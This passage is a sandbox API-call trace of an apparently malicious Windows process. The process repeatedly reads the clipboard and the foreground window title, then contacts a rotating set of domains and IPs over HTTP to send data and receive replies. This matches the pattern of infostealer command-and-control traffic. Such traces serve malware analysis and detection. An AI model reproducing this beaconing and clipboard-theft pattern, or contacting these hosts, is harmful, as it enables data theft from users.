(s=0x2138, buf=0xb0dd322*, len=166, flags=0) returned 166 [0154.800] setsockopt (s=0x2138, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0154.800] recv (in: s=0x2138, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 377 [0154.846] closesocket (s=0x2138) returned 0 [0154.847] Sleep (dwMilliseconds=0x1388) [0154.849] OpenClipboard (hWndNewOwner=0x0) returned 1 [0154.849] GetClipboardData (uFormat=0xd) returned 0x4a21810 [0154.849] GlobalLock (hMem=0x4a21810) returned 0x4a21810 [0154.849] GlobalUnlock (hMem=0x4a21810) returned 1 [0154.849] CloseClipboard () returned 1 [0154.849] socket (af=2, type=1, protocol=6) returned 0x218c [0154.849] getaddrinfo (in: pNodeName="www.thevillageplumbers.com", pServiceName="80", pHints=0x4b14dd8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b14e08 | out: ppResult=0x4b14e08*=0x85d6330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d9c0*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), ai_next=0x0)) returned 0 [0154.878] connect (s=0x218c, name=0x4b4d9c0*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0154.901] RtlIntegerToChar (in: Value=0x1bd, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="445") returned 0x0 [0154.902] send (s=0x218c, buf=0xb0bff22*, len=874, flags=0) returned 874 [0154.902] closesocket (s=0x218c) returned 0 [0154.903] socket (af=2, type=1, protocol=6) returned 0x218c [0154.903] connect (s=0x218c, name=0x4b4d9c0*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0154.925] send (s=0x218c, buf=0xb0dd322*, len=178, flags=0) returned 178 [0154.925] setsockopt (s=0x218c, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0154.925] recv (in: s=0x218c, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 461 [0155.129] closesocket (s=0x218c) returned 0 [0155.129] Sleep (dwMilliseconds=0x1388) [0155.131] OpenClipboard (hWndNewOwner=0x0) returned 1 [0155.131] GetClipboardData (uFormat=0xd) returned 0x4a21900 [0155.131] GlobalLock (hMem=0x4a21900) returned 0x4a21900 [0155.131] GlobalUnlock (hMem=0x4a21900) returned 1 [0155.131] CloseClipboard () returned 1 [0155.131] socket (af=2, type=1, protocol=6) returned 0x218c [0155.131] getaddrinfo (in: pNodeName="www.golfsol.art", pServiceName="80", pHints=0x4b15178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b151a8 | out: ppResult=0x4b151a8*=0x4d56300*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d880*(sa_family=2, sin_port=0x50, sin_addr="99.86.186.56"), ai_next=0x4d56780*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d600*(sa_family=2, sin_port=0x50, sin_addr="99.86.186.55"), ai_next=0x4d56e80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d540*(sa_family=2, sin_port=0x50, sin_addr="99.86.186.83"), ai_next=0x4d56ec0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d380*(sa_family=2, sin_port=0x50, sin_addr="99.86.186.18"), ai_next=0x0))))) returned 0 [0155.180] connect (s=0x218c, name=0x4b4d880*(sa_family=2, sin_port=0x50, sin_addr="99.86.186.56"), namelen=16) returned 0 [0155.277] RtlIntegerToChar (in: Value=0x1bd, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="445") returned 0x0 [0155.277] send (s=0x218c, buf=0xb0bff22*, len=841, flags=0) returned 841 [0155.277] closesocket (s=0x218c) returned 0 [0155.278] socket (af=2, type=1, protocol=6) returned 0x218c [0155.278] connect (s=0x218c, name=0x4b4d880*(sa_family=2, sin_port=0x50, sin_addr="99.86.186.56"), namelen=16) returned 0 [0155.381] send (s=0x218c, buf=0xb0dd322*, len=167, flags=0) returned 167 [0155.382] setsockopt (s=0x218c, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0155.382] recv (in: s=0x218c, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 676 [0155.505] closesocket (s=0x218c) returned 0 [0155.506] Sleep (dwMilliseconds=0x1388) [0155.507] OpenClipboard (hWndNewOwner=0x0) returned 1 [0155.507] GetClipboardData (uFormat=0xd) returned 0x4a20ff0 [0155.507] GlobalLock (hMem=0x4a20ff0) returned 0x4a20ff0 [0155.508] GlobalUnlock (hMem=0x4a20ff0) returned 1 [0155.508] CloseClipboard () returned 1 [0155.508] socket (af=2, type=1, protocol=6) returned 0x218c [0155.508] getaddrinfo (in: pNodeName="www.nudesalon.digital", pServiceName="80", pHints=0x4b15518*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b15548 | out: ppResult=0x4b15548*=0x4d56340*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d620*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), ai_next=0x0)) returned 0 [0155.521] connect (s=0x218c, name=0x4b4d620*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0155.541] RtlIntegerToChar (in: Value=0x1bd, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="445") returned 0x0 [0155.541] send (s=0x218c, buf=0xb0bff22*, len=859, flags=0) returned 859 [0155.542] closesocket (s=0x218c) returned 0 [0155.542] socket (af=2, type=1, protocol=6) returned 0x218c [0155.543] connect (s=0x218c, name=0x4b4d620*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0155.565] send (s=0x218c, buf=0xb0dd322*, len=173, flags=0) returned 173 [0155.566] setsockopt (s=0x218c, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0155.566] recv (in: s=0x218c, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 461 [0155.771] closesocket (s=0x218c) returned 0 [0155.774] Sleep (dwMilliseconds=0x1388) [0155.775] OpenClipboard (hWndNewOwner=0x0) returned 1 [0155.775] GetClipboardData (uFormat=0xd) returned 0x4a21810 [0155.775] GlobalLock (hMem=0x4a21810) returned 0x4a21810 [0155.775] GlobalUnlock (hMem=0x4a21810) returned 1 [0155.775] CloseClipboard () returned 1 [0155.776] socket (af=2, type=1, protocol=6) returned 0x218c [0155.776] getaddrinfo (in: pNodeName="www.iktbn-c01.com", pServiceName="80", pHints=0x4b158b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b158e8 | out: ppResult=0x4b158e8*=0x4c8b010*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d740*(sa_family=2, sin_port=0x50, sin_addr="172.67.189.216"), ai_next=0x4c8b1d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d640*(sa_family=2, sin_port=0x50, sin_addr="104.21.9.250"), ai_next=0x0))) returned 0 [0155.791] connect (s=0x218c, name=0x4b4d740*(sa_family=2, sin_port=0x50, sin_addr="172.67.189.216"), namelen=16) returned 0 [0155.810] RtlIntegerToChar (in: Value=0x1bd, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="445") returned 0x0 [0155.810] send (s=0x218c, buf=0xb0bff22*, len=847, flags=0) returned 847 [0155.810] closesocket (s=0x218c) returned 0 [0155.811] socket (af=2, type=1, protocol=6) returned 0x218c [0155.811] connect (s=0x218c, name=0x4b4d740*(sa_family=2, sin_port=0x50, sin_addr="172.67.189.216"), namelen=16) returned 0 [0155.839] send (s=0x218c, buf=0xb0dd322*, len=169, flags=0) returned 169 [0155.839] setsockopt (s=0x218c, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0155.839] recv (in: s=0x218c, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 850 [0155.941] closesocket (s=0x218c) returned 0 [0155.942] Sleep (dwMilliseconds=0x1388) [0155.944] OpenClipboard (hWndNewOwner=0x0) returned 1 [0155.944] GetClipboardData (uFormat=0xd) returned 0x4a21810 [0155.944] GlobalLock (hMem=0x4a21810) returned 0x4a21810 [0155.944] GlobalUnlock (hMem=0x4a21810) returned 1 [0155.944] CloseClipboard () returned 1 [0155.944] socket (af=2, type=1, protocol=6) returned 0x218c [0155.945] getaddrinfo (in: pNodeName="www.baila.madrid", pServiceName="80", pHints=0x4b15c58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b15c88 | out: ppResult=0x4b15c88*=0x4c8ab10*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d560*(sa_family=2, sin_port=0x50, sin_addr="31.214.178.54"), ai_next=0x0)) returned 0 [0155.971] connect (s=0x218c, name=0x4b4d560*(sa_family=2, sin_port=0x50, sin_addr="31.214.178.54"), namelen=16) returned 0 [0156.026] RtlIntegerToChar (in: Value=0x1bd, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="445") returned 0x0 [0156.026] send (s=0x218c, buf=0xb0bff22*, len=844, flags=0) returned 844 [0156.026] closesocket (s=0x218c) returned 0 [0156.027] socket (af=2, type=1, protocol=6) returned 0x218c [0156.027] connect (s=0x218c, name=0x4b4d560*(sa_family=2, sin_port=0x50, sin_addr="31.214.178.54"), namelen=16) returned 0 [0156.084] send (s=0x218c, buf=0xb0dd322*, len=168, flags=0) returned 168 [0156.084] setsockopt (s=0x218c, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0156.085] recv (in: s=0x218c, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 2920 [0156.227] closesocket (s=0x218c) returned 0 [0156.227] Sleep (dwMilliseconds=0x1388) [0156.228] OpenClipboard (hWndNewOwner=0x0) returned 1 [0156.228] GetClipboardData (uFormat=0xd) returned 0x4a20d70 [0156.229] GlobalLock (hMem=0x4a20d70) returned 0x4a20d70 [0156.229] GlobalUnlock (hMem=0x4a20d70) returned 1 [0156.229] CloseClipboard () returned 1 [0156.229] Sleep (dwMilliseconds=0x1388) [0156.230] Sleep (dwMilliseconds=0x1388) [0156.232] Sleep (dwMilliseconds=0x1388) [0156.233] Sleep (dwMilliseconds=0x1388) [0156.236] Sleep (dwMilliseconds=0x1388) [0156.237] Sleep (dwMilliseconds=0x1388) [0156.239] Sleep (dwMilliseconds=0x1388) [0156.240] Sleep (dwMilliseconds=0x1388) [0156.242] Sleep (dwMilliseconds=0x1388) [0156.243] Sleep (dwMilliseconds=0x1388) [0156.245] Sleep (dwMilliseconds=0x1388) [0156.246] Sleep (dwMilliseconds=0x1388) [0156.248] Sleep (dwMilliseconds=0x1388) [0156.249] Sleep (dwMilliseconds=0x1388) [0156.251] Sleep (dwMilliseconds=0x1388) [0156.252] Sleep (dwMilliseconds=0x1388) [0156.254] Sleep (dwMilliseconds=0x1388) [0156.255] Sleep (dwMilliseconds=0x1388) [0156.257] Sleep (dwMilliseconds=0x1388) [0156.258] Sleep (dwMilliseconds=0x1388) [0156.260] Sleep (dwMilliseconds=0x1388) [0156.261] Sleep (dwMilliseconds=0x1388) [0156.264] Sleep (dwMilliseconds=0x1388) [0156.266] Sleep (dwMilliseconds=0x1388) [0156.267] Sleep (dwMilliseconds=0x1388) [0156.270] Sleep (dwMilliseconds=0x1388) [0156.271] Sleep (dwMilliseconds=0x1388) [0156.272] Sleep (dwMilliseconds=0x1388) [0156.274] Sleep (dwMilliseconds=0x1388) [0156.275] Sleep (dwMilliseconds=0x1388) [0156.277] Sleep (dwMilliseconds=0x1388) [0156.278] Sleep (dwMilliseconds=0x1388) [0156.280] Sleep (dwMilliseconds=0x1388) [0156.281] Sleep (dwMilliseconds=0x1388) [0156.283] Sleep (dwMilliseconds=0x1388) [0156.284] Sleep (dwMilliseconds=0x1388) [0156.286] Sleep (dwMilliseconds=0x1388) [0156.287] Sleep (dwMilliseconds=0x1388) [0156.289] Sleep (dwMilliseconds=0x1388) [0156.290] Sleep (dwMilliseconds=0x1388) [0156.294] Sleep (dwMilliseconds=0x1388) [0156.295] Sleep (dwMilliseconds=0x1388) [0156.296] Sleep (dwMilliseconds=0x1388) [0156.298] Sleep (dwMilliseconds=0x1388) [0156.299] Sleep (dwMilliseconds=0x1388) [0156.301] Sleep (dwMilliseconds=0x1388) [0156.302] Sleep (dwMilliseconds=0x1388) [0156.304] Sleep (dwMilliseconds=0x1388) [0156.305] Sleep (dwMilliseconds=0x1388) [0156.307] Sleep (dwMilliseconds=0x1388) [0156.309] Sleep (dwMilliseconds=0x1388) [0156.311] Sleep (dwMilliseconds=0x1388) [0156.313] Sleep (dwMilliseconds=0x1388) [0156.314] Sleep (dwMilliseconds=0x1388) [0156.315] Sleep (dwMilliseconds=0x1388) [0156.317] Sleep (dwMilliseconds=0x1388) [0156.318] Sleep (dwMilliseconds=0x1388) [0156.320] Sleep (dwMilliseconds=0x1388) [0156.323] Sleep (dwMilliseconds=0x1388) [0156.324] Sleep (dwMilliseconds=0x1388) [0156.327] Sleep (dwMilliseconds=0x1388) [0156.328] Sleep (dwMilliseconds=0x1388) [0156.329] Sleep (dwMilliseconds=0x1388) [0156.331] Sleep (dwMilliseconds=0x1388) [0156.332] Sleep (dwMilliseconds=0x1388) [0156.335] Sleep (dwMilliseconds=0x1388) [0156.336] Sleep (dwMilliseconds=0x1388) [0156.337] Sleep (dwMilliseconds=0x1388) [0156.339] Sleep (dwMilliseconds=0x1388) [0156.340] OpenClipboard (hWndNewOwner=0x0) returned 1 [0156.340] GetClipboardData (uFormat=0xd) returned 0x4a20b90 [0156.340] GlobalLock (hMem=0x4a20b90) returned 0x4a20b90 [0156.340] GlobalUnlock (hMem=0x4a20b90) returned 1 [0156.340] CloseClipboard () returned 1 [0156.340] socket (af=2, type=1, protocol=6) returned 0x21c8 [0156.341] getaddrinfo (in: pNodeName="www.thejegroupllc.com", pServiceName="80", pHints=0x4b16398*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b163c8 | out: ppResult=0x4b163c8*=0x49f75f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d2c0*(sa_family=2, sin_port=0x50, sin_addr="81.169.145.157"), ai_next=0x0)) returned 0 [0156.345] connect (s=0x21c8, name=0x4b4d2c0*(sa_family=2, sin_port=0x50, sin_addr="81.169.145.157"), namelen=16) returned 0 [0156.377] RtlIntegerToChar (in: Value=0x1bd, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="445") returned 0x0 [0156.377] send (s=0x21c8, buf=0xb0bff22*, len=859, flags=0) returned 859 [0156.378] closesocket (s=0x21c8) returned 0 [0156.378] socket (af=2, type=1, protocol=6) returned 0x21c8 [0156.378] connect (s=0x21c8, name=0x4b4d2c0*(sa_family=2, sin_port=0x50, sin_addr="81.169.145.157"), namelen=16) returned 0 [0156.403] send (s=0x21c8, buf=0xb0dd322*, len=173, flags=0) returned 173 [0156.403] setsockopt (s=0x21c8, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0156.403] recv (in: s=0x21c8, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 374 [0156.440] closesocket (s=0x21c8) returned 0 [0156.441] Sleep (dwMilliseconds=0x1388) [0156.442] OpenClipboard (hWndNewOwner=0x0) returned 1 [0156.442] GetClipboardData (uFormat=0xd) returned 0x4a21720 [0156.442] GlobalLock (hMem=0x4a21720) returned 0x4a21720 [0156.442] GlobalUnlock (hMem=0x4a21720) returned 1 [0156.442] CloseClipboard () returned 1 [0156.443] socket (af=2, type=1, protocol=6) returned 0x21c8 [0156.443] getaddrinfo (in: pNodeName="www.teelandcompany.com", pServiceName="80", pHints=0x4b16738*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b16768 | out: ppResult=0x4b16768*=0x49f86b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d4a0*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), ai_next=0x0)) returned 0 [0156.456] connect (s=0x21c8, name=0x4b4d4a0*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0156.476] RtlIntegerToChar (in: Value=0x1bd, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="445") returned 0x0 [0156.476] send (s=0x21c8, buf=0xb0bff22*, len=862, flags=0) returned 862 [0156.476] closesocket (s=0x21c8) returned 0 [0156.477] socket (af=2, type=1, protocol=6) returned 0x21c8 [0156.477] connect (s=0x21c8, name=0x4b4d4a0*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0156.501] send (s=0x21c8, buf=0xb0dd322*, len=174, flags=0) returned 174 [0156.502] setsockopt (s=0x21c8, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0156.502] recv (in: s=0x21c8, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 461 [0156.644] closesocket (s=0x21c8) returned 0 [0156.645] Sleep (dwMilliseconds=0x1388) [0156.646] OpenClipboard (hWndNewOwner=0x0) returned 1 [0156.646] GetClipboardData (uFormat=0xd) returned 0x4a20d70 [0156.646] GlobalLock (hMem=0x4a20d70) returned 0x4a20d70 [0156.646] GlobalUnlock (hMem=0x4a20d70) returned 1 [0156.646] CloseClipboard () returned 1 [0156.647] socket (af=2, type=1, protocol=6) returned 0x2198 [0156.647] getaddrinfo (in: pNodeName="www.sec-app.pro", pServiceName="80", pHints=0x4b16ad8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b16b08 | out: ppResult=0x4b16b08*=0x0) returned 11001 [0156.802] getaddrinfo (in: pNodeName="www.sec-app.pro", pServiceName="80", pHints=0x4b16ad8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b16b08 | out: ppResult=0x4b16b08*=0x0) returned 11001 [0156.802] Sleep (dwMilliseconds=0x1388) [0156.806] OpenClipboard (hWndNewOwner=0x0) returned 1 [0156.806] GetClipboardData (uFormat=0xd) returned 0x4a20910 [0156.807] GlobalLock (hMem=0x4a20910) returned 0x4a20910 [0156.807] GetForegroundWindow () returned 0x2007c [0156.807] GetWindowTextW (in: hWnd=0x2007c, lpString=0xb0b72a2, nMaxCount=260 | out: lpString="") returned 0 [0156.875] GlobalUnlock (hMem=0x4a20910) returned 1 [0156.875] CloseClipboard () returned 1 [0157.147] socket (af=2, type=1, protocol=6) returned 0x2180 [0157.148] getaddrinfo (in: pNodeName="www.thenewtocsin.com", pServiceName="80", pHints=0x4b13478*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b134a8 | out: ppResult=0x4b134a8*=0x49f54f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d340*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.211"), ai_next=0x49f61f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d3c0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.217"), ai_next=0x49f7470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d3e0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.216"), ai_next=0x49f73f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d440*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.210"), ai_next=0x49f74f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d520*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.215"), ai_next=0x49f7f70*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d5a0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.218"), ai_next=0x49f82b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d6c0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.212"), ai_next=0x0)))))))) returned 0 [0157.180] connect (s=0x2180, name=0x4b4d340*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.211"), namelen=16) returned 0 [0157.359] send (s=0x2180, buf=0xb0dd322*, len=176, flags=0) returned 176 [0157.360] setsockopt (s=0x2180, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0157.360] recv (in: s=0x2180, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c) returned -1 [0157.534] closesocket (s=0x2180) returned 0 [0157.534] Sleep (dwMilliseconds=0x1388) [0157.536] OpenClipboard (hWndNewOwner=0x0) returned 1 [0157.536] GetClipboardData (uFormat=0xd) returned 0x4a21400 [0157.536] GlobalLock (hMem=0x4a21400) returned 0x4a21400 [0157.536] GlobalUnlock (hMem=0x4a21400) returned 1 [0157.536] CloseClipboard () returned 1 [0157.537] socket (af=2, type=1, protocol=6) returned 0x2180 [0157.537] getaddrinfo (in: pNodeName="www.rap8b55d.com", pServiceName="80", pHints=0x4b13818*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b13848 | out: ppResult=0x4b13848*=0x4c8a410*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4a020*(sa_family=2, sin_port=0x50, sin_addr="198.54.112.103"), ai_next=0x0)) returned 0 [0157.547] connect (s=0x2180, name=0x4b4a020*(sa_family=2, sin_port=0x50, sin_addr="198.54.112.103"), namelen=16) returned 0 [0157.719] RtlIntegerToChar (in: Value=0x285, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="645") returned 0x0 [0157.719] send (s=0x2180, buf=0xb0bff22*, len=1040, flags=0) returned 1040 [0157.719] closesocket (s=0x2180) returned 0 [0157.720] socket (af=2, type=1, protocol=6) returned 0x2180 [0157.720] connect (s=0x2180, name=0x4b4a020*(sa_family=2, sin_port=0x50, sin_addr="198.54.112.103"), namelen=16) returned 0 [0157.900] send (s=0x2180, buf=0xb0dd322*, len=172, flags=0) returned 172 [0157.901] setsockopt (s=0x2180, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0157.901] recv (in: s=0x2180, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 458 [0158.361] closesocket (s=0x2180) returned 0 [0158.362] Sleep (dwMilliseconds=0x1388) [0158.364] OpenClipboard (hWndNewOwner=0x0) returned 1 [0158.364] GetClipboardData (uFormat=0xd) returned 0x4a20eb0 [0158.364] GlobalLock (hMem=0x4a20eb0) returned 0x4a20eb0 [0158.364] GlobalUnlock (hMem=0x4a20eb0) returned 1 [0158.364] CloseClipboard () returned 1 [0158.364] socket (af=2, type=1, protocol=6) returned 0x2180 [0158.365] getaddrinfo (in: pNodeName="www.pondokbali.store", pServiceName="80", pHints=0x4b13bb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b13be8 | out: ppResult=0x4b13be8*=0x4c8abd0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b49c40*(sa_family=2, sin_port=0x50, sin_addr="23.227.38.74"), ai_next=0x0)) returned 0 [0158.395] connect (s=0x2180, name=0x4b49c40*(sa_family=2, sin_port=0x50, sin_addr="23.227.38.74"), namelen=16) returned 0 [0158.428] RtlIntegerToChar (in: Value=0x285, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="645") returned 0x0 [0158.428] send (s=0x2180, buf=0xb0bff22*, len=1052, flags=0) returned 1052 [0158.428] closesocket (s=0x2180) returned 0 [0158.429] socket (af=2, type=1, protocol=6) returned 0x2180 [0158.429] connect (s=0x2180, name=0x4b49c40*(sa_family=2, sin_port=0x50, sin_addr="23.227.38.74"), namelen=16) returned 0 [0158.451] send (s=0x2180, buf=0xb0dd322*, len=176, flags=0) returned 176 [0158.451] setsockopt (s=0x2180, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0158.451] recv (in: s=0x2180, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 5770 [0158.522] closesocket (s=0x2180) returned 0 [0158.522] Sleep (dwMilliseconds=0x1388) [0158.524] OpenClipboard (hWndNewOwner=0x0) returned 1 [0158.524] GetClipboardData (uFormat=0xd) returned 0x4a216d0 [0158.524] GlobalLock (hMem=0x4a216d0) returned 0x4a216d0 [0158.524] GlobalUnlock (hMem=0x4a216d0) returned 1 [0158.524] CloseClipboard () returned 1 [0158.524] socket (af=2, type=1, protocol=6) returned 0x2180 [0158.524] getaddrinfo (in: pNodeName="www.sustainablefoodfactory.com", pServiceName="80", pHints=0x4b13f58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b13f88 | out: ppResult=0x4b13f88*=0x4d58380*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b49c20*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), ai_next=0x0)) returned 0 [0158.546] connect (s=0x2180, name=0x4b49c20*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0158.566] RtlIntegerToChar (in: Value=0x285, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="645") returned 0x0 [0158.566] send (s=0x2180, buf=0xb0bff22*, len=1082, flags=0) returned 1082 [0158.567] closesocket (s=0x2180) returned 0 [0158.567] socket (af=2, type=1, protocol=6) returned 0x2180 [0158.568] connect (s=0x2180, name=0x4b49c20*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0158.591] send (s=0x2180, buf=0xb0dd322*, len=186, flags=0) returned 186 [0158.591] setsockopt (s=0x2180, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0158.591] recv (in: s=0x2180, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 461 [0158.749] closesocket (s=0x2180) returned 0 [0158.749] Sleep (dwMilliseconds=0x1388) [0158.751] OpenClipboard (hWndNewOwner=0x0) returned 1 [0158.751] GetClipboardData (uFormat=0xd) returned 0x4a21680 [0158.751] GlobalLock (hMem=0x4a21680) returned 0x4a21680 [0158.751] GlobalUnlock (hMem=0x4a21680) returned 1 [0158.751] CloseClipboard () returned 1 [0158.751] socket (af=2, type=1, protocol=6) returned 0x21e4 [0158.751] getaddrinfo (in: pNodeName="www.thejegroupllc.com", pServiceName="80", pHints=0x4b142f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b14328 | out: ppResult=0x4b14328*=0x4d58700*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b49f00*(sa_family=2, sin_port=0x50, sin_addr="81.169.145.157"), ai_next=0x0)) returned 0 [0159.484] connect (s=0x21e4, name=0x4b49f00*(sa_family=2, sin_port=0x50, sin_addr="81.169.145.157"), namelen=16) returned 0 [0159.767] RtlIntegerToChar (in: Value=0x285, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="645") returned 0x0 [0159.767] send (s=0x21e4, buf=0xb0bff22*, len=1055, flags=0) returned 1055 [0159.768] closesocket (s=0x21e4) returned 0 [0159.856] socket (af=2, type=1, protocol=6) 